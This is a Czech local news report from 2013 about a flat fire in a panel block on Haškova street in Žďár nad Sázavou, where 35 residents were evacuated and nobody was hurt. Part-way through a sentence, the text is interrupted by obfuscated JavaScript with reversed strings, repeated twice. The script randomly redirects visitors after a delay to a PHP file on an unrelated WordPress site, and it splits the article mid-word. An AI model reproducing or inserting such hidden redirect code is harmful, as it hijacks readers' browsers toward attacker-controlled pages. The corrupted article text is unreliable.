Žďár nad Sázavou, aktuality, požár, Haškova
Rainbow page separator

Kvůli požáru bytu muselo dům opustit 35 lidí

Středa, 7. srpna 2013

hasici-ohen-zdar-nad-sazavouŽďár nad Sázavou /Dvě jednotky hasičů zasahovaly v úterý dopoledne u požáru bytu ve čtvrtém patře panelového domu na ulici Haškova ve Žďáře nad Sázavou. Z domu hasiči preventivně evakuovali 35 lidí. Při požáru ani samotném zásahu nebyl nikdo zraněn. Plameny za sebou zanechaly majetkovou škodu v předběžné výši 80 tisíc korun. Příčina vzniku požáru se nadále vyšetřuje.

Hlášení o požáru přijalo Krajské operační a informační středisko Hasičského záchranného sboru Kraje Vysočina v 10:18 hod. K požáru vyjeli žďárští profesionální i dobrovolní hasiči.

Kvůli zakouření z domu hasiči preventivně evakuovali 35 lidí. Požár zařízení bytu se jednotkám podařilo velmi rychle lokalizovat a následně i zlikvidovat. Zakouřené pros["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tory hasiči odvětrali za pomoci přirozené a přetlakové ventilace.  Ještě před pravým polednem se mohli lidé vrátit zpět do svých domovů.